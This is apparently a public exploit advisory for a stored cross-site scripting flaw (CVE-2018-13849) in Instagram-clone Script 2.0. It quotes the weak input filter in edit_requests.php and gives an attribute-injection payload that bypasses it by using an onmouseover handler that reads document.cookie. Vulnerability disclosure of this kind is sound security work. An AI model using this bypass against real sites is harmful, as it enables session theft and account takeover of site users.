Instagram Clone Script 2.0 Cross Site Scripting

`# Exploit Title: Instagram-clone Script 2.0 - Cross-Site Scripting  
# Date: 2018-07-10  
# Exploit Author: L0RD  
# Vendor Homepage: https://github.com/yTakkar/Instagram-clone  
# Version: 2.0  
# CVE: CVE-2018-13849  
# Tested on: Kali linux  
  
# POC : Persistent Cross site scripting :  
# vulnerable file : edit_requests.php  
# vulnerable code :  
  
if (isset($_POST['username'])) {  
$username = preg_replace("#[<> ]#i", "", $_POST['username']);  
$firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);  
$surname = preg_replace("#[<> ]#i", "", $_POST['surname']);  
$bio = preg_replace("#[<>]#i", "", $_POST['bio']);  
$instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);  
$youtube = preg_replace("#[<>]#i", "", $_POST['youtube']);  
$facebook = preg_replace("#[<>]#i", "", $_POST['facebook']);  
$twitter = preg_replace("#[<>]#i", "", $_POST['twitter']);  
$website = preg_replace("#[<>]#i", "", $_POST['website']);  
$mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']);  
$tags = preg_replace("#[\s]#", "-", $_POST['tags']);  
$session = $_SESSION['id'];  
  
$m=$edit->saveProfileEditing($username, $firstname, $surname, $bio,  
$instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);  
$array = array("mssg" => $m);  
echo json_encode($array);  
}  
  
# We use this payload to bypass filter :  
# Payload :   
  
"onmouseover=" alert(document.cookie)  
  
`